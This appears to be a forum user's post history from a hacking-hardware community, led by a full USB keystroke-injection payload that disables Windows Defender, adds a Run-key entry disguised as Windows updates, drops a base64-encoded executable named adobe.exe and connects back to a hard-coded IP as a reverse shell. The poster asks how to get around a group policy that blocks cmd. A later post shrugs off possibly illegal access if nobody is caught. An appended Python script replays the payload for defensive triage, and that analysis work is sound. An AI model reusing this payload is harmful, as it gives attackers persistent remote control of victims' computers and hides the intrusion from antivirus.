
Roark
Active Members
Posts: 13
Days Won: 1

Posts posted by Roark

  1. I adapted several other reverse shells into this script, which disables Windows Defender, runs at startup, and will attempt to reconnect every five minutes if the connection is lost.

    However, (in this hypothetical situation) the script can't run on the target PC because, even though it has admin privileges, both cmd prompt and regedit are disabled by group policy.

    My question is, how do I enable cmd prompt without editing the registry, or is there no way around it?

    REM reverse shell script adapted by Roark
    REM ***opens admin cmd prompt, answering the UAC prompt with ALT y***
    DELAY 1000
    CAPSLOCK
    GUI r
    DELAY 400
    STRING powershell Start-Process cmd -Verb runAs
    ENTER
    DELAY 500
    ALT y
    DELAY 500
    REM ***hides cmd prompt window***
    ALT SPACE
    STRING M
    DOWNARROW
    REPEAT 100
    ENTER
    REM ***temporarily disable windows defender***
    STRING powershell
    ENTER
    DELAY 200
    STRING Set-MpPreference -DisableRealtimeMonitoring $true
    ENTER
    STRING exit
    ENTER
    DELAY 400
    REM ***permanently disable windows defender***
    STRING erase /Q c:\windows\system32\WinDefend.reg
    ENTER
    STRING copy con c:\windows\system32\WinDefend.reg
    ENTER
    REM regedit.exe only accepts REGEDIT4 or "Windows Registry Editor Version 5.00" as a header
    STRING REGEDIT4
    ENTER
    STRING [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender]
    ENTER
    STRING "DisableAntiSpyware"=dword:00000001
    ENTER
    STRING "DisableRoutinelyTakingAction"=dword:00000001
    ENTER
    CTRL z
    ENTER
    STRING REGEDIT /s c:\windows\system32\WinDefend.reg
    ENTER
    STRING del c:\windows\system32\WinDefend.reg
    ENTER
    REM ***create vbs file to run shell on start***
    STRING erase /Q c:\windows\system32\runwinupdate.vbs
    ENTER
    STRING copy con c:\windows\system32\runwinupdate.vbs
    ENTER
    STRING Set WshShell = CreateObject("WScript.Shell")
    ENTER
    REM full path: a Run key entry gives no reliable working directory
    STRING WshShell.Run Chr(34) & "c:\windows\system32\winupdate.bat" & Chr(34), 0
    ENTER
    STRING Set WshShell = Nothing
    ENTER
    CTRL z
    ENTER
    REM ***add runwinupdates to start registry***
    STRING erase /Q c:\windows\system32\dirty.reg
    ENTER
    STRING copy con c:\windows\system32\dirty.reg
    ENTER
    STRING REGEDIT4
    ENTER
    STRING [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
    ENTER
    REM backslashes in .reg string values must be doubled
    STRING "windowsupdates"="c:\\windows\\system32\\runwinupdate.vbs"
    ENTER
    CTRL z
    ENTER
    STRING REGEDIT /s dirty.reg
    ENTER
    STRING del dirty.reg
    ENTER
    REM ***connect on startup and try to reconnect every 5 minutes***
    STRING erase /Q c:\windows\system32\winupdate.bat
    ENTER
    STRING copy con c:\windows\system32\winupdate.bat
    ENTER
    STRING @echo off
    ENTER
    STRING :LoopStart
    ENTER
    REM IMAGENAME takes the bare file name; "[NOT]" was help-text notation, the keyword is NOT
    STRING tasklist /FI "IMAGENAME eq adobe.exe" 2>NUL | find /I "adobe.exe" >NUL
    ENTER
    STRING if NOT "%ERRORLEVEL%"=="0" c:\windows\system32\adobe.exe 104.236.244.103 31330
    ENTER
    STRING timeout /t 300
    ENTER
    STRING GOTO LoopStart
    ENTER
    CTRL z
    ENTER
    REM ***create decode file for shell***
    STRING erase /Q c:\windows\system32\decoder.vbs
    ENTER
    STRING copy con c:\windows\system32\decoder.vbs
    ENTER
    STRING Option Explicit:Dim arguments, inFile, outFile:Set arguments = WScript.Arguments:inFile = arguments(0)
    STRING :outFile = arguments(1):Dim base64Encoded, base64Decoded, outByteArray:dim objFS:dim objTS:set objFS =
    STRING CreateObject("Scripting.FileSystemObject"):
    ENTER
    STRING set objTS = objFS.OpenTextFile(inFile, 1):base64Encoded =
    STRING objTS.ReadAll:base64Decoded = decodeBase64(base64Encoded):writeBytes outFile, base64Decoded:private function
    STRING decodeBase64(base64):
    ENTER
    STRING dim DM, EL:Set DM = CreateObject("Microsoft.XMLDOM"):Set EL = DM.createElement("tmp"):
    STRING EL.DataType = "bin.base64":EL.Text = base64:decodeBase64 = EL.NodeTypedValue:end function:private Sub
    STRING writeBytes(file, bytes):Dim binaryStream:
    ENTER
    STRING Set binaryStream = CreateObject("ADODB.Stream"):binaryStream.Type = 1:
    STRING binaryStream.Open:binaryStream.Write bytes:binaryStream.SaveToFile file, 2:End Sub
    ENTER
    CTRL z
    ENTER
    REM ***create shell***
    STRING erase /Q c:\windows\system32\adobeupdate.txt
    ENTER
    STRING copy con c:\windows\system32\adobeupdate.txt
    ENTER
    STRING TVprZXJuZWwzMi5kbGwAAFBFAABMAQIAAAAAAAAAAAAAAAAA4AAPAQsBAAAAAgAAAAAAAAAA
    ENTER
    STRING AADfQgAAEAAAAAAQAAAAAEAAABAAAAACAAAEAAAAAAAAAAQAAAAAAAAAAFAAAAACAAAAAAAA
    ENTER
    STRING AgAAAAAAEAAAEAAAAAAQAAAQAAAAAAAAEAAAAAAAAAAAAAAA20IAABQAAAAAAAAAAAAAAAAA
    ENTER
    STRING AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    ENTER
    STRING AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAATUVXAEYS
    ENTER
    STRING 0sMAMAAAABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA4AAAwALSdduKFuvUABAAAABAAADvAgAA
    ENTER
    STRING AAIAAAAAAAAAAAAAAAAAAOAAAMC+HEBAAIvera1QrZeygKS2gP8Tc/kzyf8TcxYzwP8TcyG2
    ENTER
    STRING gEGwEP8TEsBz+nU+quvg6HI+AAAC9oPZAXUO/1P86yas0eh0LxPJ6xqRSMHgCKz/U/w9AH0A
    ENTER
    STRING AHMKgPwFcwaD+H93AkFBlYvFtgBWi/cr8POkXuubrYXAdZCtlq2XVqw8AHX7/1PwlVatD8hA
    ENTER
    STRING WXTseQesPAB1+5FAUFX/U/SrdefDAAAAAAAzyUH/ExPJ/xNy+MOwQgAAvUIAAAAAAAAAQEAA
    ENTER
    STRING MAFAAAAQQAAAEEAAaBwGMkAHagHoDnw4VQzoQgLIFTiean446lMMelAsFnRBMP0Bv1WysTNq
    ENTER
    STRING kQIGsnxVmiejeINmxwVke0+mOGe8XVBmlD05ZqNofmRmfiF9i3MM2QpqaJQtoTp6b0gV6kwF
    ENTER
    STRING EVBkkBBNRFWRFDxAeGooEGhdKP81MHTopJ5RVFWhVY2/bg4KCJAiC+FRFOgfgUvD/yUkILtv
    ENTER
    STRING KhwGQxghFL3DIghxzAFVi+yBxHz+/4hWV+hgrN2JRfwzHcmLdX44PB10Bx4iQPdB6/RR0XLp
    ENTER
    STRING AOFYO8F0C19eMLgDucnCCOGGSY29PHDlQyoJzy/gArAgqutz8iiNhRU5i/A2+DMqM+sbiwNm
    ENTER
    STRING MgfvImUgTf4iEeEoLe2UCIO53LcwS3T7OzpNCKgVWWUdZwpME0EdDxTr5qoNNgcZhzj0sH/A
    ENTER
    STRING VXMRi30Mxhe4An+CohOdaLCgWDQzDUYN5tH34f5Yo+7nRLsfFqnOEQTeVQE81BTUDhszwE7s
    ENTER
    STRING hwtw0ooGRj08ArMSDvffkOsLLDAZjQyJBkiDLQrAdfHoBBEzUcI44jCDxAf0avXoaQkZSf+9
    ENTER
    STRING gqogC9Aqk3U3+FAinSmGBvzoTS9oiyQ45lMaDwiNUAMhGIPABOP5//6AAvfTI8uB4USAdHzp
    ENTER
    STRING bMEMYHV3BvQQwEAC0OEbwlFbOkfESRnKDFcGCDAAADBAAGMwbWQAZj9AABQ4IEADd3MyXzOY
    ENTER
    STRING LmRs48CAZwdldGhvc0BieW5he23PHmOePPfr/w4SV1NBXc9hckZ1cBh5aMoscxNPJmNrYu/B
    ENTER
    STRING /7gDbJUacspebEzHV9NpdPNGp7yRR8NMQ29tiGFuZDZMaURifoB2cvudOlC3gudzFUFYIcBk
    ENTER
    STRING SNBDL2AAAAAAAGY/QABMb2FkTGlicmFyeUEAR2V0UHJvY0FkZHJlc3MAAAAAAAAAAAAAAAAA
    ENTER
    STRING AAxAAADpdL7//wAAAAIAAAAMQAAA
    ENTER
    CTRL z
    ENTER
    REM ***decode and clean up***
    STRING cscript c:\windows\system32\decoder.vbs c:\windows\system32\adobeupdate.txt c:\windows\system32\adobe.exe
    ENTER
    STRING erase c:\windows\system32\adobeupdate.txt
    ENTER
    STRING erase c:\windows\system32\decoder.vbs
    ENTER
    REM ***run shell***
    STRING c:\windows\system32\winupdate.bat
    ENTER
    STRING exit
    ENTER
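
A triage helper for payloads like the one above, added here as an example; it is not code from the post and not a Hak5 tool. Instead of running the inject on a VM, it replays the Ducky keystroke stream into a minimal model of the cmd.exe session: STRING adds typed text, ENTER submits the line, `copy con <path>` ... CTRL z captures the file being written, `REGEDIT /s <file>` is resolved against the files already captured, and ALT SPACE ... ENTER is treated as the window menu so the "M" for Move is not mistaken for a command. From that it lists every dropped path and every registry value the payload imports, flags Run/RunOnce entries and Windows Defender policy keys, and rejects .reg bodies whose first line is neither `REGEDIT4` nor `Windows Registry Editor Version 5.00`, the only two headers regedit.exe accepts. Assumptions, all mine: the elevated cmd's working directory is C:\Windows\System32 (so a bare `dirty.reg` resolves there), paths are compared case-insensitively, and the input is a constructed, abridged copy of the posted payload with a malformed `Version 4.00` header in the Defender .reg so the header check has something to catch.

```python
"""Replay a Ducky Script payload into a model of the cmd session it drives.
Added example, not code from the post; nothing is executed. STRING is typed
text, ENTER submits a line, copy con ... CTRL z writes a file, REGEDIT /s imports it."""
import re
from dataclasses import dataclass, field

SYSTEM32 = r"c:\windows\system32"   # assumed cwd of the elevated cmd (assumption)
VALID_REG_HEADERS = ("REGEDIT4", "Windows Registry Editor Version 5.00")
RUN_KEYS = (r"\microsoft\windows\currentversion\run", r"\microsoft\windows\currentversion\runonce")
DEFENDER_POLICY = r"policies\microsoft\windows defender"

@dataclass
class Findings:
    files: dict = field(default_factory=dict)            # path -> lines written
    commands: list = field(default_factory=list)         # every submitted line
    reg_values: list = field(default_factory=list)       # (key, name, data)
    bad_reg_headers: list = field(default_factory=list)  # regedit.exe rejects these
    persistence: list = field(default_factory=list)      # (name, data) under Run keys
    defender_policy: list = field(default_factory=list)  # (name, data) under Defender policy

def _abspath(p: str) -> str:  # resolve as cmd would: case-insensitive, relative to System32
    p = p.strip().lower()
    return p if re.match(r"^[a-z]:\\", p) else SYSTEM32 + "\\" + p

def parse_reg(lines):
    """Return (header_ok, [(key, name, data)]) for the body of a .reg file."""
    header_ok = bool(lines) and lines[0].strip() in VALID_REG_HEADERS
    key, values = None, []
    for ln in (l.strip() for l in lines[1:]):
        if ln.startswith("[") and ln.endswith("]"):
            key = ln[1:-1]
        elif key and (m := re.match(r'^"([^"]+)"=(.*)$', ln)):
            values.append((key, m.group(1), m.group(2)))
    return header_ok, values

def _command(f: Findings, line: str) -> None:
    f.commands.append(line)
    if m := re.match(r"regedit\s+/s\s+(.+)", line, re.I):
        path = _abspath(m.group(1))
        header_ok, values = parse_reg(f.files.get(path, []))
        if not header_ok:
            f.bad_reg_headers.append(path)
        for key, name, data in values:    # record what was attempted either way
            f.reg_values.append((key, name, data))
            if key.lower().endswith(RUN_KEYS):
                f.persistence.append((name, data))
            if DEFENDER_POLICY in key.lower():
                f.defender_policy.append((name, data))

def replay(script: str) -> Findings:
    f, buf, heredoc, in_menu = Findings(), "", None, False
    for raw in script.splitlines():
        tok = raw.strip()
        if not tok or tok.startswith("REM"):
            continue
        key, _, arg = tok.partition(" ")
        if key == "STRING":
            buf += arg
        elif key == "CTRL" and arg.lower() == "z":
            heredoc, buf = None, ""              # ^Z closes the copy con file
        elif key == "ALT":                       # ALT SPACE opens the window menu;
            in_menu, buf = arg.upper() == "SPACE", ""   # other ALT chords act at once
        elif key == "ENTER":
            line, buf = buf, ""
            if in_menu:
                in_menu = False                  # ENTER confirms the menu choice
            elif heredoc:
                f.files[heredoc].append(line)
            elif line:
                _command(f, line)
                if m := re.match(r"copy con (.+)", line, re.I):
                    heredoc = _abspath(m.group(1))
                    f.files[heredoc] = []
        # DELAY, GUI, CAPSLOCK, DOWNARROW, REPEAT, ... type no text
    return f

SAMPLE = "\n".join([                     # constructed, abridged copy of the posted payload
    "ALT SPACE", "STRING M", "ENTER",    # window menu: Move, must not become a command
    r"STRING copy con c:\windows\system32\WinDefend.reg", "ENTER",
    "STRING Windows Registry Editor Version 4.00", "ENTER",   # deliberately malformed header
    r"STRING [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender]", "ENTER",
    'STRING "DisableAntiSpyware"=dword:00000001', "ENTER",
    "CTRL z", "ENTER",
    r"STRING REGEDIT /s c:\windows\system32\WinDefend.reg", "ENTER",
    "STRING copy con dirty.reg", "ENTER", "STRING REGEDIT4", "ENTER",
    r"STRING [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]", "ENTER",
    r'STRING "windowsupdates"="c:\\windows\\system32\\runwinupdate.vbs"', "ENTER",
    "CTRL z", "ENTER", "STRING REGEDIT /s dirty.reg", "ENTER",
])

if __name__ == "__main__":
    print(replay(SAMPLE))
```

Run it as a plain script (file name of your choosing; `ducky_replay.py` is my assumption) and it prints the Findings for the embedded sample: two dropped files, the Defender .reg rejected for its header, one Run-key persistence value. For anyone turning this into detections: on current Windows 10/11 builds with Tamper Protection on, `Set-MpPreference -DisableRealtimeMonitoring` and the `DisableAntiSpyware` policy value are not honoured, so the file and registry artifacts this replay surfaces are the dependable indicators, not a Defender outage.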
    
  2. For number six, while I seriously doubt that was completely legal, the chances of the neighbour being smart enough to figure out that "your friend" did anything are so small that it doesn't matter. In other words, as long as you don't get caught and no one gets hurt, it's ok. As for everything else, as far as I understand it, monitoring a network that you don't own is illegal. However, I could definitely be wrong about that, and it would be interesting to find the legal loopholes. Good luck in your search for a legal grey area, keep us updated.

  3. I just flashed my duck with the Multi Duck firmware (m_duck_v2.hex). I encoded two simple scripts and placed them in the root of the SD card. One is just a delay and is named inject.bin, the other is named inject1.bin, it opens notepad and types "payload two executed." When I turn on num lock and insert the duck, it blinks green, then red, then green, and turns off, without executing the second script. I tried using caps lock, then scroll lock, then I used different scripts, and found out that it is executing the first script, but not the second. I've messed with this for a while, any help would be great.

  4. I was wondering if there is a VOIP module for the LAN Turtle, I've done some research and haven't found one, but maybe I just missed it. If there isn't already a module for VOIP, how difficult would it be to create one, or would it be impossible altogether? Thanks.
